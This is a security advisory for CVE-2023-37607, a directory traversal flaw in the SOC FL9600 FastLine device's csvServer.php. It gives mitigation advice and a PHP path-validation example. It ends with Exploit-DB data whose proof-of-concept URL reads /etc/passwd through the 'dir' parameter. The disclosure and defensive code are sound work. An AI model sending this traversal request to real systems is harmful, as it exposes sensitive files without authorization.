Vendor: SOC FL9600 FastLine
By: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
CVSS: 6.1 (HIGH)
Directory Traversal (CWE-22)
Product Name: SOC FL9600 FastLine
Affected Version From: V06
Affected Version To: V06
Patch Exists: NO
Related CVE: CVE-2023-37607
CPE: a:automatic-systems:soc_fl9600_fastline:V06
Metasploit:
Other Scripts:
Platforms Tested:
2023

Directory Traversal in Automatic-Systems SOC FL9600 FastLine

The Automatic-Systems SOC FL9600 FastLine V06 allows an attacker to traverse directories by manipulating the 'dir' parameter in the 'csvServer.php' script, leading to unauthorized access to sensitive files such as '/etc/passwd'. This vulnerability has been assigned CVE-2023-37607.

Mitigation:

To mitigate this vulnerability, validate and sanitize the 'dir' parameter before it is used to build a file path. Additionally, implement proper access controls to prevent unauthorized directory traversal.
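
One way to implement the validation described above, as an added example (not the vendor's code and not part of the original advisory). The function name resolveCsvPath, the temporary export root and the sample requests are assumptions constructed for illustration; the check canonicalizes the requested path with realpath() and rejects anything that resolves outside the export root.

```php
<?php
declare(strict_types=1);

// Resolve a client-supplied dir/file pair to a canonical path inside $base.
// Returns null when the request must be rejected.
// (Hypothetical helper; not taken from csvServer.php.)
function resolveCsvPath(string $base, string $dir, string $file): ?string
{
    // NUL bytes are never valid in a path.
    if (strpos($dir . $file, "\0") !== false) {
        return null;
    }
    // The file parameter must be a bare name, never a path.
    if ($file === '' || $file === '.' || $file === '..' || $file !== basename($file)) {
        return null;
    }
    $realBase = realpath($base);
    if ($realBase === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false means the target does not exist.
    $candidate = realpath($realBase . '/' . $dir . '/' . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare canonical paths; the trailing slash stops "/srv/csv-old" matching "/srv/csv".
    $prefix = rtrim($realBase, '/') . '/';
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed demo data: a temporary export root holding one CSV file.
$base = sys_get_temp_dir() . '/csv_demo_' . getmypid();
mkdir($base . '/logs', 0700, true);
file_put_contents($base . '/logs/events.csv', "id,event\n1,open\n");

$requests = [
    ['logs', 'events.csv'],          // path inside the export root
    ['../../../../etc/', 'passwd'],  // the dir/file values shown in this advisory
    ['logs', '../../etc/passwd'],    // file parameter carrying a path
];
foreach ($requests as [$dir, $file]) {
    $path = resolveCsvPath($base, $dir, $file);
    printf("dir=%-18s file=%-18s => %s\n", $dir, $file, $path ?? 'REJECTED');
}

// Remove the constructed demo data.
unlink($base . '/logs/events.csv');
rmdir($base . '/logs');
rmdir($base);
```

The containment test runs on the canonical path rather than on the raw parameter, so encoded or nested `..` sequences that survive string filtering are still caught.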

Exploit-DB raw data:

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Google Dork: 
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link: 
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607

Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd